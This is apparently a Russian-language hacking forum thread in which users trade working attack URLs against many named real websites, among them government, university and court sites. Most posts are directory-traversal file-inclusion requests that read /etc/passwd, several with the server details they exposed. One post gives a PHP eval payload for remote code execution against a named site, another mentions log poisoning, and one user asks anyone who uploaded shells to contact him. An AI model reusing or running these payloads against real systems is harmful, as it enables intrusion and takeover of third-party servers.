_ttp://terror.fi/ybu/index.php?content=../../../../../etc/passwd%00 PHP: Linux version 2.6.32-379.5.1.lve1.1.9.6.1.el6.x86_64 (mockbuild@koji.cloudlinux.com) (gcc version 4.4.6 20120305 (Red Hat 4.4.6-4) (GCC) ) #1 SMP Wed Sep 12 05:36:10 EDT 2012 _ttp://www.arcmusic.co.uk/index.php?page=../../../../../../etc/passwd%00 PHP: Linux version 2.6.18-194.8.1.el5 (mockbuild@builder17.centos.org) (gcc version 4.1.2 20080704 (Red Hat 4.1.2-48)) #1 SMP Thu Jul 1 19:07:06 EDT 2010 _ttp://franchiseinfo.buffalowildwings.com/www/index.php?page=../../../../etc/passwd%00 PHP: Linux version 2.6.18-194.17.1.el5 (mockbuild@x86-002.build.bos.redhat.com) (gcc version 4.1.2 20080704 (Red Hat 4.1.2-48)) #1 SMP Mon Sep 20 07:12:06 EDT 2010
http://www.site-2010.ru/search/?text={${eval($_REQUEST[a])}}&a=ob_clean();eval(stripslashes($_REQUEST[e]));exit;&e=[php_code] ob_clean(); - очистка буфера вывода, зачем лишний трафик гонять) exit; - та же причина. e=[php_code] <- а тут лучше POST'ом постить. Example: http://www.site-2010.ru/search/?text={${eval($_REQUEST[a])}}&a=ob_clean();eval(stripslashes($_REQUEST[e]));exit;&e=phpinfo();
_ttp://netrenderer.com/?page=../../../../../etc/passwd%00 PHP: Linux version 2.6.34.10-0.6-default (geeko@buildhost) (gcc version 4.5.0 20100604 [gcc-4_5-branch revision 160292] (SUSE Linux) ) #1 SMP 2011-12-13 18:27:38 +0100 _ttp://www.aunmas.com/doc/show_doc.php?doc=../../../../../../../../etc/passwd%00 PHP: Linux version 2.6.32.48-grsec-dh (root@dl345) (gcc version 4.4.5 (Debian 4.4.5-8) ) #1 SMP Thu Nov 24 09:29:43 CET 2011 _ttp://pheugo.com/cameras/index.php?page=../../../../../../etc/passwd%00 PHP: Linux version 3.0.9-bl3-grsec (root@debian) (gcc version 4.4.5 (Debian 4.4.5-8) ) #9 SMP Thu Feb 2 08:22:02 EST 2012 _ttp://www.thegreatlakesgroup.com/index.php?page=../../etc/passwd%00 _ttp://povstanets.kiev.ua/index.php?do=../../../../../../etc/passwd%00 ps. Жду залившихся в пм
_ttp://ptwc.weather.gov/text.php?id=../../../../../etc/passwd%00 PHP: Linux version 2.6.32-279.1.1.el6.x86_64 (mockbuild@x86-003.build.bos.redhat.com) (gcc version 4.4.6 20120305 (Red Hat 4.4.6-4) (GCC) ) #1 SMP Wed Jun 20 11:41:22 EDT 2012 _ttp://medclinic.bli.uci.edu/doctors.php?doc=../../../../etc/passwd%00 PHP: Linux version 2.6.29.6-213.fc11.i686.PAE (mockbuild@x86-3.fedora.phx.redhat.com) (gcc version 4.4.0 20090506 (Red Hat 4.4.0-4) (GCC) ) #1 SMP Tue Jul 7 20:59:29 EDT 2009 _ttp://www.allangurganus.com/book.php?doc=../../../../../../etc/passwd%00 PHP: Linux version 3.0.9-bl3-grsec (root@debian) (gcc version 4.4.5 (Debian 4.4.5-8) ) #9 SMP Thu Feb 2 08:22:02 EST 2012 _ttp://sindicat.info/veure.php?doc=../../../../../etc/passwd%00 PHP: Linux version 2.6.30-5.slh.1-sidux-amd64 (Debian 2.6.30-20) (s.l-h@gmx.de) (gcc version 4.3.4 (Debian 4.3.4-1) ) #1 SMP PREEMPT Sun Aug 16 22:25:06 UTC 2009
_ttp://www.todayshospitalist.com/index.php?b=../../../../etc/passwd%00 PHP: Linux version 2.6.9-023stab046.2-enterprise (root@rhel4-32) (gcc version 3.4.5 20051201 (Red Hat 3.4.5-2)) #1 SMP Mon Dec 10 15:22:33 MSK 2007 _ttp://www.catho.org/9.php?d=../../../../etc/passwd%00 PHP: Linux version 2.6.32-22-generic-pae (buildd@palmer) (gcc version 4.4.3 (Ubuntu 4.4.3-4ubuntu5) ) #36-Ubuntu SMP Thu Jun 3 23:14:23 UTC 2010 _ttp://www.mspaintadventures.com/?s=../../../../etc/passwd%00 _ttp://www.atmos.albany.edu/index.php?d=../../../../../etc/passwd%00
_ttp://www.stadtgarten.de/?m=../../../../../etc/passwd%00 PHP: Linux version 2.6.26-2-amd64 (Debian 2.6.26-29) (dannf@debian.org) (gcc version 4.1.3 20080704 (prerelease) (Debian 4.1.2-25)) #1 SMP Sun Mar 4 21:48:06 UTC 2012 _ttp://www.nfps.no/index.php?doc=../../../../../../../../etc/passwd%00 PHP: Linux version 2.6.32-28-server (buildd@allspice) (gcc version 4.4.3 (Ubuntu 4.4.3-4ubuntu5) ) #55-Ubuntu SMP Mon Jan 10 23:57:16 UTC 2011 _ttp://www.montecarlonet.org/index.php?p=../../../../etc/passwd%00 PHP: Linux version 2.6.31.14-0.6-desktop (geeko@buildhost) (gcc version 4.4.1 [gcc-4_4-branch revision 150839] (SUSE Linux) ) #1 SMP PREEMPT 2010-12-10 11:18:32 +0100 _ttp://www.physicsmasterclasses.org/index.php?cat=../../../etc/passwd%00
_ttp://www.cjr.org/resources/?c=../../../../../etc/passwd%00 PHP: Linux version 2.6.32-43-server (buildd@allspice) (gcc version 4.4.3 (Ubuntu 4.4.3-4ubuntu5.1) ) #97-Ubuntu SMP Wed Sep 5 16:56:41 UTC 2012 _ttp://www.gardenwriters.org/gwa.php?p=../../../../etc/passwd%00 PHP: Linux version 2.6.18-274.7.1.el5PAE (mockbuild@builder10.centos.org) (gcc version 4.1.2 20080704 (Red Hat 4.1.2-51)) #1 SMP Thu Oct 20 17:03:59 EDT 2011 _ttp://www.rbg.org.uk/index.php?p=../../../../etc/passwd%00 PHP: Linux version 2.6.27.41-170.2.117.fc10.x86_64 (mockbuild@x86-4.fedora.phx.redhat.com) (gcc version 4.3.2 20081105 (Red Hat 4.3.2-7) (GCC) ) #1 SMP Thu Dec 10 10:36:29 EST 2009 _ttp://www.mss.cbi.uni-erlangen.de/index.php?p1=../../../../../../../../../etc/passwd%00
Code: http://junona.org/modules.php?name=maps&type=../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././ проблемный инклуд)
Code: _ttp://www.gk-adept.ru/novosti.php?id=27-30_11_2012%27&id1=../../../../../../etc/passwd%00////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
Смысл слэшов? Если ядовитый ноль и так работает: Code: _ttp://www.gk-adept.ru/novosti.php?id=27-30_11_2012%27&id1=../../../../../../etc/passwd%00
Верховный Суд Республики Беларусь Code: h__p://www.sup court .by/cgi-bin/index.cgi?m1=1&m2=1&vd= 7&vm=d&vr=../../../../../../../../../../etc/passwd%00
АПпчхи... PHP: _ttp://www.sofora.ru/landdesign_uslugi_melichimles_polezno.html?id=../../../../../../etc/passwd%00
как-то притихли)) PHP: http://www.claudiocauduro.com.br/index1.php?sessoes=../../../../etc/passwd --дноинжект) Code: http://www.espaces-transfrontaliers.org/en/cadre.php?page=[B]index[/B]&idos=idpoint&idfiche=62'
я хз что чей это сайт , но копирайт у него такой : Copyright 2008 Tokyo Metropolitan Government All rights reserved. PHP: http://pollen.tokyo-kafun.jp/kafun/index.php?action=../../../../../etc/passwd%00
PHP: http://www.villars-burquin.ch/index.php?include=../etc/passwd%00 http://www.parmalat.ro/index.php?include=../../../../../etc/passwd%00 http://www.leciel.ch/index.php?include=../../etc/passwd%00
Добрый день ачат Держите : PHP: http://staff.science.uva.nl/~rvalenti/index.php?content=../../../../etc/passwd%00 http://www.shodor.org/discretemath/index.php?content=../../../../../etc/passwd%00 (var/log/httpd/ access_log %00) http://www.eu-japan-brt.eu/index.php?content=../../../../../etc/passwd%00
http://www.dhsd.limpopo.gov.za/index.php?page=/etc/passwd%00 http://www.gayovich.com.ua/index2.php?link=/etc/passwd%00
Что-то здесь давно меня не было. PHP: http://www.genhound.co.uk/surname_dict.php?inc=../../../../etc/passwd%00 http://www.ltmfg.com/index.php?content=../../../../etc/passwd%00 http://www.winekr.co.kr/mart7/inc.php?inc=../../../../../etc/passwd%00
